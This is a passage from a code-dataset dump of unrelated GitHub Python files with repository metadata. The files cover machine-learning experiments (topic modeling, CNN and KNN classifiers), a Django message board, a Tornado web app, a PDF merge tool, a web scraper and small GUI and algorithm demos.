s.setfile()\n","repo_name":"sxc562586657/tcollector","sub_path":"uagent/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"73933522783","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: zding\n\"\"\"\n\nfrom sklearn.decomposition import LatentDirichletAllocation\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport preprocessing\nimport numpy as np\nimport pyLDAvis\nimport pyLDAvis.sklearn\n\nlda = LatentDirichletAllocation(n_components=10, max_iter=5)\ndf=preprocessing.as_list('train.csv')\ndata=df['text_list'].tolist()\ndisaster_data=[]\nnondisaster_data=[]\nfor index, row in df.iterrows():\n new_list=[]\n for t in row['text_list']:\n if not t.startswith('http') and \\\n not t.startswith('#') and \\\n not t.startswith('@'):\n new_list.append(t)\n if row['target']==1:\n disaster_data.append(','.join(new_list))\n else:\n nondisaster_data.append(','.join(new_list))\ncount_vect = CountVectorizer(stop_words='english')\n'''\nedit here if want to switch between nondisaster topics and disaster topics\n'''\ndisaster_terms=count_vect.fit_transform(disaster_data)\n#nondisaster_terms=count_vect.fit_transform(nondisaster_data)\n\n\nlda.fit_transform(disaster_terms)\n\n#print words in top ten topics\nfor index, topic in enumerate(lda.components_):\n print([count_vect.get_feature_names()[i] for i in topic.argsort()[-11:-1]])\n print('\\n')\n \n#visualize topic modeling using pyldavis\nimg=pyLDAvis.sklearn.prepare(lda, disaster_terms, count_vect)\npyLDAvis.show(img)\n","repo_name":"dingzy1995/disasterorNot_twitterChallenge","sub_path":"topic_modeling.py","file_name":"topic_modeling.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"282462529","text":"import pandas as pd\nimport numpy as np\n\nimport os\n\nimport tensorflow.keras as tk\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, Dense, MaxPooling2D, Flatten, BatchNormalization, Dropout\n\nimport warnings\nwarnings.simplefilter('ignore')\n\nclass Models:\n '''\n \n fit and save as .h5 five convolutional NN models, one for every dataset.\n \n '''\n def __init__(self):\n '''\n \n define the folder path that contain all the tensors.\n \n '''\n self.path = 'tensors/'\n\n def arrays(self):\n '''\n \n load X, y of every dataset.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('en'):\n if file[3] == 'X':\n self.en_X = np.load(self.path + file)\n if file[3] == 'y':\n self.en_y = np.load(self.path + file)\n\n if file.startswith('fr'):\n if file[3] == 'X':\n self.fr_X = np.load(self.path + file)\n if file[3] == 'y':\n self.fr_y = np.load(self.path + file)\n\n if file.startswith('ge'):\n if file[3] == 'X':\n self.ge_X = np.load(self.path + file)\n if file[3] == 'y':\n self.ge_y = np.load(self.path + file)\n\n if file.startswith('it'):\n if file[3] == 'X':\n self.it_X = np.load(self.path + file)\n if file[3] == 'y':\n self.it_y = np.load(self.path + file)\n\n if file.startswith('lan'):\n if file[4] == 'X':\n self.lan_X = np.load(self.path + file)\n if file[4] == 'y':\n self.lan_y = np.load(self.path + file)\n\n def lan_arrays(self):\n '''\n \n function to return X, y of language dataset.\n \n '''\n self.arrays()\n\n return self.lan_X, self.lan_y\n\n def en_arrays(self):\n '''\n \n function to return X, y of english dataset.\n \n '''\n self.arrays()\n\n return self.en_X, self.en_y\n\n def ge_arrays(self):\n '''\n \n function to return X, y of german dataset.\n \n '''\n self.arrays()\n\n return self.ge_X, self.ge_y\n\n def it_arrays(self):\n '''\n \n function to return X, y of italian dataset.\n \n '''\n self.arrays()\n\n return self.it_X, self.it_y\n\n def fr_arrays(self):\n '''\n \n function to return X, y of french dataset.\n \n '''\n self.arrays()\n\n return self.fr_X.shape, self.fr_y\n \n def structure(self, units):\n '''\n \n define convolutional NN structure, \n units = number classes for classification.\n \n '''\n K.clear_session()\n\n self.model = Sequential([\n\n Conv2D(filters = 64, \n kernel_size = (3, 3), \n strides = (3, 3), \n padding = 'valid', \n activation = tk.activations.relu, \n input_shape = (376, 376, 1), \n kernel_initializer = tk.initializers.GlorotNormal(seed = 34)), \n\n BatchNormalization(), \n\n MaxPooling2D(pool_size = (3, 3), \n strides = (3, 3), \n padding = 'valid'),\n\n Dropout(0.4), \n\n Conv2D(filters = 128, \n kernel_size = (3, 3), \n strides = (3, 3), \n padding = 'valid', \n activation = tk.activations.relu), \n\n BatchNormalization(), \n\n MaxPooling2D(pool_size = (3, 3), \n strides = (3, 3), \n padding = 'valid'),\n\n Dropout(0.4), \n\n Flatten(), \n\n Dense(units = 100, \n activation = tk.activations.relu, \n kernel_regularizer=regularizers.l2(0.001)), \n\n BatchNormalization(), \n\n Dense(units = 50, \n activation = tk.activations.relu, \n kernel_regularizer=regularizers.l2(0.001)), \n\n BatchNormalization(), \n\n Dense(units = 20, \n activation = tk.activations.relu, \n kernel_regularizer=regularizers.l2(0.001)), \n\n BatchNormalization(), \n\n Dense(units = units, \n activation = tk.activations.softmax)\n\n ])\n\n self.summary = self.model.summary()\n self.model.compile(optimizer = 'adam', \n loss = tk.losses.categorical_crossentropy, \n metrics = ['categorical_accuracy'])\n \n def lan_fit_save(self):\n '''\n \n fit the model on language datas and save it as .h5.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('lan'):\n if file[4] == 'X':\n self.lan_X = np.load(self.path + file)\n if file[4] == 'y':\n self.lan_y = np.load(self.path + file)\n\n self.lan_classes = list(np.unique(self.lan_y))\n self.structure(len(self.lan_classes))\n self.ser_lan_y = pd.Series(self.lan_y).map({self.lan_classes[0]: 0, self.lan_classes[1]: 1, self.lan_classes[2]: 2, self.lan_classes[3]: 3})\n self.cat_lan_y = to_categorical(self.ser_lan_y)\n\n self.lan_model = self.model.fit(self.lan_X, \n self.cat_lan_y, \n epochs = 20, \n batch_size = 64, \n validation_split = 0.2)\n \n # self.model.save('models/lan_model.h5')\n \n def en_fit_save(self):\n '''\n \n fit the model on english datas and save it as .h5.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('en'):\n if file[3] == 'X':\n self.en_X = np.load(self.path + file)\n if file[3] == 'y':\n self.en_y = np.load(self.path + file)\n\n self.en_classes = list(np.unique(self.en_y))\n self.structure(len(self.en_classes))\n self.ser_en_y = pd.Series(self.en_y).map({self.en_classes[0]: 0, self.en_classes[1]: 1, self.en_classes[2]: 2, self.en_classes[3]: 3, self.en_classes[4]: 4,self.en_classes[5]: 5})\n self.cat_en_y = to_categorical(self.ser_en_y)\n\n self.en_model = self.model.fit(self.en_X, \n self.cat_en_y, \n epochs = 20, \n batch_size = 64, \n validation_split = 0.2)\n \n # self.model.save('models/en_model.h5')\n \n def ge_fit_save(self):\n '''\n \n fit the model on german datas and save it as .h5.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('ge'):\n if file[3] == 'X':\n self.ge_X = np.load(self.path + file)\n if file[3] == 'y':\n self.ge_y = np.load(self.path + file)\n\n self.ge_classes = list(np.unique(self.ge_y))\n self.structure(len(self.ge_classes))\n self.ser_ge_y = pd.Series(self.ge_y).map({self.ge_classes[0]: 0, self.ge_classes[1]: 1, self.ge_classes[2]: 2, self.ge_classes[3]: 3, self.ge_classes[4]: 4, self.ge_classes[5]: 5, self.ge_classes[6]: 6})\n self.cat_ge_y = to_categorical(self.ser_ge_y)\n\n self.ge_model = self.model.fit(self.ge_X, \n self.cat_ge_y, \n epochs = 20, \n batch_size = 64, \n validation_split = 0.2)\n \n # self.model.save('models/ge_model.h5')\n \n def it_fit_save(self):\n '''\n \n fit the model on italian datas and save it as .h5.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('it'):\n if file[3] == 'X':\n self.it_X = np.load(self.path + file)\n if file[3] == 'y':\n self.it_y = np.load(self.path + file)\n\n self.it_classes = list(np.unique(self.it_y))\n self.structure(len(self.it_classes))\n self.ser_it_y = pd.Series(self.it_y).map({self.it_classes[0]: 0, self.it_classes[1]: 1, self.it_classes[2]: 2, self.it_classes[3]: 3, self.it_classes[4]: 4, self.it_classes[5]: 5, self.it_classes[6]: 6})\n self.cat_it_y = to_categorical(self.ser_it_y)\n\n self.it_model = self.model.fit(self.it_X, \n self.cat_it_y, \n epochs = 20, \n batch_size = 64, \n validation_split = 0.2)\n \n # self.model.save('models/it_model.h5')\n\n \n def fr_fit_save(self):\n '''\n \n fit the model on french datas and save it as .h5.\n \n '''\n for file in os.listdir(self.path):\n if file.startswith('fr'):\n if file[3] == 'X':\n self.fr_X = np.load(self.path + file)\n if file[3] == 'y':\n self.fr_y = np.load(self.path + file)\n\n self.fr_classes = list(np.unique(self.fr_y))\n self.structure(len(self.fr_classes))\n self.ser_fr_y = pd.Series(self.fr_y).map({self.fr_classes[0]: 0, self.fr_classes[1]: 1, self.fr_classes[2]: 2, self.fr_classes[3]: 3})\n self.cat_fr_y = to_categorical(self.ser_fr_y)\n\n self.fr_model = self.model.fit(self.fr_X, \n self.cat_fr_y, \n epochs = 10, \n batch_size = 64, \n validation_split = 0.2)\n \n # self.model.save('models/fr_model.h5')\n\n# Models().lan_fit_save()\n# Models().en_fit_save()\n# Models().ge_fit_save()\n# Models().it_fit_save()\n# Models().fr_fit_save()","repo_name":"lucaberbenni/emotions_classifier","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25234127865","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\ndef computer_guess(number):\n '''Используется классический алгоритм бинарного поиска. Функция принимает в качестве аргумента загаданное \n пользователем число в диапазоне от 1 до 100, а алгоритм отгадывает его за минимальное количество попыток. \n \n Каждое предложенное в качестве отгадки число - медиана все сокращающегося диапазона в зависимости от того, \n меньше или больше отгадка по сранению с загаданным числом.\n '''\n lower_bond = 1 #Нижняя граница изначального диапазона.\n upper_bond = 100 #Верхняя граница изначального диапазона.\n guess = 50 #Первоначальная отгадка.\n count = 0 #Счетчик количества попыток.\n \n if number<1 or number>100:\n print(\"The number must be in range [1, 100]\")\n else:\n while guess != number:\n count +=1\n guess = (lower_bond+upper_bond)//2 #Шаблон для выдачи отгадки.\n print(\"Computer's guess is...\", guess)\n \n #Постепенное сокращение диапазона (границ) отгадки.\n if guess > number:\n upper_bond = guess\n elif guess < number:\n lower_bond = guess + 1\n\n print('The computer guessed', guess, 'in only', count, 'attempts!')\n \n#computer_guess()\n\n","repo_name":"Ksenia-Bochkareva/module_0","sub_path":"Project_0.py","file_name":"Project_0.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42778942701","text":"from django.shortcuts import render\r\nfrom .models import Message,Commit\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.db import models\r\nfrom django.http import HttpResponse\r\nfrom django.shortcuts import render,redirect\r\nfrom django.urls import reverse\r\n\r\n# Create your views here.\r\ndef get_message(request):\r\n return render(request,'msg.html')\r\n\r\ndef get_content(request):\r\n if request.method == 'POST':\r\n if request.POST['name'] == '' and request.POST['message'] == '':\r\n return HttpResponse(\"

表单填写有误

\")\r\n else:\r\n name = request.POST.get('name','')\r\n email = request.POST.get('email','')\r\n message = request.POST.get('message','')\r\n\r\n Q_message = Message()\r\n Q_message.name = name\r\n Q_message.email = email\r\n Q_message.text = message\r\n\r\n Q_message.save()\r\n return HttpResponseRedirect('/message/message-list/')\r\n else:\r\n return render(request,'msg.html')\r\n\r\ndef message_list(request):\r\n objs = Message.objects.all()\r\n comObjs = Commit.objects.all()\r\n context = {\r\n 'comObjs': comObjs,\r\n 'objs': objs,\r\n }\r\n return render(request, 'message-list.html', context)\r\n\r\n\r\ndef reply(request,id):\r\n if request.user.is_authenticated:\r\n uid=id\r\n relay = 1\r\n comObjs = Commit.objects.all()\r\n objs = Message.objects.all()\r\n context = {\r\n 'comObjs': comObjs,\r\n 'relay':relay,\r\n 'objs': objs,\r\n 'uid':uid,\r\n }\r\n\r\n return render(request,'message-list.html',context)\r\n else:\r\n return HttpResponseRedirect('/userprofile/login')\r\n\r\ndef commit(request,id):\r\n if request.method == 'GET':\r\n\r\n cuid=id\r\n objs = Message.objects.all()\r\n comObjs = Commit.objects.all()\r\n print(cuid)\r\n context = {\r\n 'comObjs':comObjs,\r\n 'cuid': cuid,\r\n 'objs': objs,\r\n }\r\n return render(request,'message-list.html',context)\r\n else:\r\n st_commit = Commit()\r\n name=request.user\r\n text=request.POST.get('text','')\r\n st_commit.name = name\r\n st_commit.text = text\r\n st_commit.mid = id\r\n st_commit.save()\r\n\r\n return HttpResponseRedirect(\r\n reverse('message:commit',args=(id,))\r\n )\r\n\r\n","repo_name":"opsonly/my_blog","sub_path":"message/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"7"} +{"seq_id":"29826697710","text":"from operator import itemgetter # 리스트 sorting 시 특정 key 값으로 정렬하기 위함\n\nclass KNN():\n def __init__(self, k, xtrain, ytrain, yname):\n self.k = k # KNN 에서의 k 값\n self.xtrain = xtrain # train data set feature\n self.ytrain = ytrain # train data set 답\n self.yname = yname # 숫자 0~9 이름 리스트\n self.dim = xtrain[0].__len__() # dimension 즉, data set feature 종류\n self.ylen = yname.__len__() # yname 길이\n self.disarr = [] # distance array 줄임말, [거리, 답] 을 담고있는 리스트\n self.vote_cnt = [[0., 0], [0., 1], [0., 2], [0., 3] ,[0., 4], [0., 5], [0., 6], [0., 7], [0., 8], [0., 9]]\n self.grapcor = [] # 그래프 출력을 하기위해 mv, wmv 의 결과를 순서대로 저장하는 전역 리스트\n self.sqrtdim_double = int((xtrain[0].__len__() ** 0.5)*2) # 784개 feature을 (28+28)개의 feature로 계산한값\n self.hand_xtrain = [] # (56+56)개의 feature로 변환한 train data를 저장하는 리스트\n\n def show_dim(self): # 변수 dim 을 출력하는 함수\n print(\"dim : \", self.dim)\n\n def change_feature(self, data_i): # 데이터 하나를 넣으면 784개 feature을 (56 + 56)개의 feature로 변환하는 함수\n dim_len = int(self.sqrtdim_double / 2) # sqrtdim_double = 56이다. dim_len = 28\n flist = [] # (56 + 56)개의 feature로 변환된 데이터를 담을 리스트\n # 행에 대하여\n for i in range(0, dim_len): # 28 행\n (x_max, x_min, res) = (-1, dim_len, 0) # 색칠되어있는 최대 index, 최소 index, 색칠된 갯수 res 초기값 설정\n for j in range(0, dim_len): # 28 열\n if data_i[i*dim_len + j] > (5/255): # train데이터의 [i][j]값이 5/255 이상이면 칠해져있다고 판단\n res += 1 # 색칠된 수 +1\n if x_max < j: # 최대 index가 현재 index보다 작다면\n x_max = j # 최대 index는 현재 index로\n if x_min > j: # 최소 index가 현재 index보다 크다면\n x_min = j # 최소 index는 현재 index로\n if x_max == -1 or x_min == dim_len: # 만일 아무것도 칠해지지 않은 경우이다\n flist.append(0) # i 행 검은색 사이 빈 공간 수(0) feature로 append\n else: # 칠해져 있는게 있는 경우\n flist.append(x_max - x_min - res + 1) # i 행 검은색 사이 빈 공간 수 feature로 append\n flist.append(res) # i 행에 칠해져 있는 갯수 feature로 append\n # 열에 대하여\n for i in range(0, dim_len): # 28 행\n (y_max, y_min, res) = (-1, dim_len, 0) # 색칠되어있는 최대 index, 최소 index, 색칠된 갯수 res 초기값 설정\n for j in range(0, dim_len): # 28 열\n if data_i[j*dim_len + i] > (5/255): # train데이터의 [j][i]값이 5/255 이상이면 칠해져있다고 판단 열을\n res += 1 # 색칠된 수 +1\n if y_max < i: # 최대 index가 현재 index보다 작다면\n y_max = i # 최대 index는 현재 index로\n if y_min > i: # 최소 index가 현재 index보다 크다면\n y_min = i # 최소 index는 현재 index로\n if y_max == -1 or y_min == dim_len: # 만일 아무것도 칠해지지 않은 경우이다\n flist.append(0) # i 열 검은색 사이 빈 공간 수(0) feature로 append\n else: # 칠해져 있는게 있는 경우\n flist.append(y_max - y_min - res + 1) # i 열 검은색 사이 빈 공간 수 feature로 append\n flist.append(res) # i 열에 칠해져 있는 갯수 feature로 append\n return flist # flist 반환\n\n def handcraft_feature(self): # 기존 train 데이터의 feature를 변환한 데이터를 hand_xtrain 리스트에 채워주는 함수\n for k in range(len(self.xtrain)): # trian 데이터의 크기 만큼 for 문\n self.hand_xtrain.append(self.change_feature(self.xtrain[k])) # change_feature함수를 적용, hand_xtrain에 append\n\n def get_nearest_k(self, xtest_i, option): # 가장가까운 점부터 순서대로 disarr 리스트에 저장해주는 함수\n if option == 'feature_compression': # option이 'feature_compression' 인 경우\n dim_len = self.sqrtdim_double * 2 # dim_len = 56 * 2 = 112\n xtesti = self.change_feature(xtest_i) # test데이터의 feature를 변경한다.\n x_train = self.hand_xtrain # 변경된 feature를 가진 train데이터를 사용한다.\n else :\n dim_len = self.dim # feature수 = self.dim\n xtesti = xtest_i # test데이터 그대로 사용\n x_train = self.xtrain # train데이터 그대로 사용\n\n for j in range(len(x_train)): # for 문 (train data set 모두에 대하여)\n res = 0. # disarr 리스트에 담을 거리 값\n for i in range(0, dim_len): # dimension 즉, feature 갯수만큼에 대하여 거리를 계산\n res = res + (float(xtesti[i]) - float(x_train[j][i]))**2 # (train0 - test0)^2 + ... + (trainN - testN)^2\n res = res**0.5 # 마지막에 0.5 승으로 루트를 씌워준다.\n self.disarr.append((res, int(self.ytrain[j]))) # disarr에 [res, 답] 을 append 해준다.\n self.disarr.sort(key=itemgetter(0)) # 최종적으로 disarr를 res 기준으로 sorting 한다 (오름차순)\n\n def mv(self): # Majority Vote 함수\n for j in range(0, self.k): # for 문 (k 값 만큼)\n self.vote_cnt[self.disarr[j][1]][0] += 1 # 가중치는 그냥 갯수이므로 +1 로 해주고, disarr의 0부터 k개를 본다.\n self.vote_cnt.sort(key=itemgetter(0), reverse=True) # vote_cnt에서 가장큰 가중치를 알기 위해 sorting reverse (내림차순)\n self.grapcor.append(self.vote_cnt[0][1]) # 결과를 grapcor 리스트에 넣어준다.\n return self.yname[self.vote_cnt[0][1]] # 결과를 이름으로 반환한다.\n def wmv(self): # Weighted Majority Vote 함수\n for j in range(0, self.k): # for 문 (k 값 만큼)\n self.vote_cnt[self.disarr[j][1]][0] += (1 / self.disarr[j][0]) # 가중치는 1/거리, disarr의 0부터 k개를 본다.\n self.vote_cnt.sort(key=itemgetter(0), reverse=True) # vote_cnt에서 가장큰 가중치를 알기 위해 sorting reverse (내림차순)\n self.grapcor.append(self.vote_cnt[0][1]) # 결과를 grapcor 리스트에 넣어준다.\n return self.yname[self.vote_cnt[0][1]] # 결과를 이름으로 반환한다.\n\n def set_k(self, k): # k 값을 설정하는 set 함수\n self.k = k\n def get_grapcor(self): # grapcor 리스트를 반환해주는 get 함수\n return self.grapcor\n def rest_votecnt(self):\n self.vote_cnt = [[0., 0], [0., 1], [0., 2], [0., 3] ,[0., 4], [0., 5], [0., 6], [0., 7], [0., 8], [0., 9]]\n def reset(self): # disarr 리스트와 vote_cnt 리스트를 초기화 하는 함수\n self.disarr = []\n self.vote_cnt = [[0., 0], [0., 1], [0., 2], [0., 3] ,[0., 4], [0., 5], [0., 6], [0., 7], [0., 8], [0., 9]]","repo_name":"jdb0ss/ML","sub_path":"MNIST_KNN/sourcecode/knnclass.py","file_name":"knnclass.py","file_ext":"py","file_size_in_byte":8347,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9039007076","text":"import numpy as np\nfrom demo import read, show\nfrom scipy.misc import imread,imresize,imsave\n\n\nimg = read(\"../matlab_example/imgs/0401.tif\")\nimg = imresize(img, (32,32))\nshow(img, cmap='gray')\n\nh , w = img.shape\n# 生成一个同样大小的复数矩阵\nF = np.zeros([h,w],'complex128')\nfor u in range(h):\n for v in range(w):\n res = 0\n for x in range(h):\n for y in range(w):\n res += img[x,y] * np.exp(-1.j * 2 * np.pi * (u * x / h + v * y / w))\n F[u,v] = res\nlog_F = np.log(1 + np.abs(F))\n\nshow(np.abs(log_F), cmap='gray')\n","repo_name":"icemansina/CUHKSZ_DIP","sub_path":"Week4/Tutorial/python_example/dft1_manual.py","file_name":"dft1_manual.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"7"} +{"seq_id":"9675910306","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import unicode_literals, print_function, division\nimport os\nimport sys\nimport logging\nimport tornado.ioloop\nimport tornado.web\nimport jinja2\nfrom tornado_jinja2 import Jinja2Loader\nfrom expenditure_application.main import ApplicationsHandler, ApplicationHandler, ApplicationApprovalHandler, \\\n ApplicationRejectionHandler, NewApplicationHandler, MailNotificationHandler\n\nLOGGER = logging.getLogger('expenditure_application')\nLOGGER.setLevel(logging.DEBUG)\nLOGGER.addHandler(logging.StreamHandler(sys.stdout))\n\n\ndef make_app():\n template_path = os.path.join(os.path.dirname(__file__), 'expenditure_application/templates')\n jinja2_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_path), autoescape=True)\n jinja2_loader = Jinja2Loader(jinja2_env)\n settings = dict(\n template_loader=jinja2_loader,\n static_path=os.path.join(os.path.dirname(__file__), 'static'),\n debug=False\n )\n return tornado.web.Application([\n (r'/', tornado.web.RedirectHandler, dict(url='/applications')),\n (r'/notify', MailNotificationHandler),\n (r'/applications', ApplicationsHandler),\n (r'/applications/new', NewApplicationHandler),\n (r'/applications/(\\d+)', ApplicationHandler),\n (r'/applications/(\\d+)/approval', ApplicationApprovalHandler),\n (r'/applications/(\\d+)/rejection', ApplicationRejectionHandler),\n ], **settings)\n\n\nif __name__ == '__main__':\n app = make_app()\n app.listen(8888, address='127.0.0.1')\n tornado.ioloop.IOLoop.current().start()\n","repo_name":"dawncold/expenditure-application","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42926682973","text":"import pandas as pd\nfrom os.path import join\nimport numpy as np\nimport sys\n\n\ndef citeseer_to_graph(dirpath = 'citeseer_data'):\n\n cites = pd.read_csv(join(dirpath, \"citeseer.cites\"), header=None, sep=\"\\t\")\n content = pd.read_csv(join(dirpath, \"citeseer.content\"), header=None, sep=\"\\t\")\n key_docs = list(set(cites.iloc[:, 0]).union(set(cites.iloc[:, 1])))\n num_docs = len(key_docs)\n key_docs_map = {key_docs[i]: i for i in range(num_docs)}\n\n num_words = content.shape[1] - 2\n key_words = []\n for i in range(0, num_words):\n key_words.append('w'+str(i))\n key_words_map = {}\n\n j=0\n for i in range(num_docs,num_docs+num_words):\n key_words_map[(key_words[j])] = i\n j+=1\n\n nodes_map = dict(key_docs_map,**key_words_map)\n\n adj = np.zeros(shape=(num_docs+num_words, num_docs+num_words), dtype=np.uint8)\n\n n = 0\n for index, row in cites.iterrows():\n sys.stdout.write('\\r' + \"(Citeseer) Loading graph... \" + str(int(n * 100 / (len(cites) + len(content)))) + '%')\n sys.stdout.flush()\n paper1 = key_docs_map[row[0]]\n paper2 = key_docs_map[row[1]]\n adj[paper2, paper1] = 1\n adj[paper1, paper2] = 1\n n+=1\n\n for index, row in content.iterrows():\n paper = row[0]\n sys.stdout.write('\\r' + \"(Citeseer) Loading graph... \" + str(int(n * 100 / (len(cites) + len(content)))) + '%')\n sys.stdout.flush()\n for i in range(1,len(row)-2):\n\n if row[i] == 1:\n if str(paper) in key_docs_map:\n adj[key_docs_map[str(paper)], num_docs+i] = 1\n adj[num_docs+i, key_docs_map[str(paper)]] = 1\n\n n+=1\n sys.stdout.write('\\r' + \"Loading graph... \" + str(100) + '%')\n sys.stdout.flush()\n sys.stdout.write('\\r' + \"Loading graph... DONE\")\n print ('\\n')\n\n nodes = {}\n for i in range(0,adj.shape[1]):\n nodes[(i)] = adj[:,i]\n\n return adj, nodes, nodes_map","repo_name":"gsap91/Graph-Convolutional-Network","sub_path":"Desktop/GraphConvolutionalNetwork/citeseer.py","file_name":"citeseer.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32808565393","text":"# (c) AlenPaulVarghese\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom typing import Dict, List\n\nfrom pikepdf import Pdf\nfrom pyrogram.handlers import MessageHandler\n\nfrom tools.scaffold import AbstractTask\n\n\nclass Merge(AbstractTask):\n def __init__(self, chat_id: int, message_id: int):\n # downloaded temporary files which are waiting for user confirmation to be added in proposed_files.\n self.temp_files: Dict[int, Path] = {}\n # files that will be going to output.\n self.proposed_files: List[Path] = []\n # for flag -q; reduces info messages.\n self.quiet: bool = False\n # for flag -i; send files directly to proposed queue without user approval.\n self.interactive: bool = False\n # handler used to register incoming media files.\n self.handler: MessageHandler = None\n\n super().__init__(chat_id, message_id)\n\n def set_handler(self, _handler: MessageHandler):\n self.handler = _handler\n\n def process(self):\n with Pdf.open(self.proposed_files.pop(0)) as init_pdf:\n for paths in self.proposed_files:\n with Pdf.open(paths) as extension:\n init_pdf.pages.extend(extension.pages)\n init_pdf.save(self.cwd / self.filename)\n","repo_name":"alenpaulvarghese/pdf_bot","sub_path":"pdf_bot/tools/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"15637154744","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://www.britannica.com/topic/list-of-cities-and-towns-in-the-United-States-2023068'\nhtml = requests.get(url)\nhtml_text = html.text\nsoup = BeautifulSoup(html_text, features=\"html.parser\")\ncity_list = []\nfor i in soup.find_all(class_=\"md-crosslink\", href=True):\n city_list.append(i.text.strip())\n\ncity_list = city_list[3:]\n\n# https://gist.github.com/norcal82/e4c7e8113f377db184bb\nstate_names = [\"Alaska\", \"Alabama\", \"Arkansas\", \"American Samoa\", \"Arizona\", \"California\", \"Colorado\", \"Connecticut\", \"District \", \"of Columbia\", \"Delaware\", \"Florida\", \"Georgia\", \"Guam\", \"Hawaii\", \"Iowa\", \"Idaho\", \"Illinois\", \"Indiana\", \"Kansas\", \"Kentucky\", \"Louisiana\", \"Massachusetts\", \"Maryland\", \"Maine\", \"Michigan\", \"Minnesota\", \"Missouri\", \"Mississippi\", \"Montana\", \"North Carolina\", \"North Dakota\", \"Nebraska\", \"New Hampshire\", \"New Jersey\", \"New Mexico\", \"Nevada\", \"New York\", \"Ohio\", \"Oklahoma\", \"Oregon\", \"Pennsylvania\", \"Puerto Rico\", \"Rhode Island\", \"South Carolina\", \"South Dakota\", \"Tennessee\", \"Texas\", \"Utah\", \"Virginia\", \"Virgin Islands\", \"Vermont\", \"Washington\", \"Wisconsin\", \"West Virginia\", \"Wyoming\"]\n\n# https://gist.github.com/JeffPaine/3083347\nstates_dict = {\n 'AK': 'Alaska',\n 'AL': 'Alabama',\n 'AR': 'Arkansas',\n 'AZ': 'Arizona',\n 'CA': 'California',\n 'CO': 'Colorado',\n 'CT': 'Connecticut',\n 'DC': 'District of Columbia',\n 'DE': 'Delaware',\n 'FL': 'Florida',\n 'GA': 'Georgia',\n 'HI': 'Hawaii',\n 'IA': 'Iowa',\n 'ID': 'Idaho',\n 'IL': 'Illinois',\n 'IN': 'Indiana',\n 'KS': 'Kansas',\n 'KY': 'Kentucky',\n 'LA': 'Louisiana',\n 'MA': 'Massachusetts',\n 'MD': 'Maryland',\n 'ME': 'Maine',\n 'MI': 'Michigan',\n 'MN': 'Minnesota',\n 'MO': 'Missouri',\n 'MS': 'Mississippi',\n 'MT': 'Montana',\n 'NC': 'North Carolina',\n 'ND': 'North Dakota',\n 'NE': 'Nebraska',\n 'NH': 'New Hampshire',\n 'NJ': 'New Jersey',\n 'NM': 'New Mexico',\n 'NV': 'Nevada',\n 'NY': 'New York',\n 'OH': 'Ohio',\n 'OK': 'Oklahoma',\n 'OR': 'Oregon',\n 'PA': 'Pennsylvania',\n 'RI': 'Rhode Island',\n 'SC': 'South Carolina',\n 'SD': 'South Dakota',\n 'TN': 'Tennessee',\n 'TX': 'Texas',\n 'UT': 'Utah',\n 'VA': 'Virginia',\n 'VT': 'Vermont',\n 'WA': 'Washington',\n 'WI': 'Wisconsin',\n 'WV': 'West Virginia',\n 'WY': 'Wyoming'\n}\n\nstates_dict = {y: x for x, y in states_dict.items()}\n\ncity_state_list = []\nstate = 'filler state'\n\nfor city in city_list:\n if city in state_names:\n state = city\n else:\n city_state_list.append(f'{city} {states_dict[state]}')\n","repo_name":"Joeyjas5963/Final-Project","sub_path":"cities.py","file_name":"cities.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71772344864","text":"from tkinter import *\n\nroot =Tk()\nroot.geometry(\"350x250\")\nroot.title(\"PanedWindow Example\")\npw = PanedWindow(orient=VERTICAL)\npw.pack(expand=True, fill=BOTH)\n\nchk = Checkbutton(pw, text=\"Click\")\nchk.pack()\n\nbtn = Button(pw, text=\"Click Me\")\nbtn.pack()\npw.add(btn)\npw.add(chk)\nroot.mainloop()","repo_name":"Coding-workplace/testing","sub_path":"TkinterPractice/singleWidgetDemo/panewindow.py","file_name":"panewindow.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42722170344","text":"\"\"\"Beacon Scanner\nhttps://adventofcode.com/2021/day/19\n\nI was in flight to Tampa for this one, so this is mostly 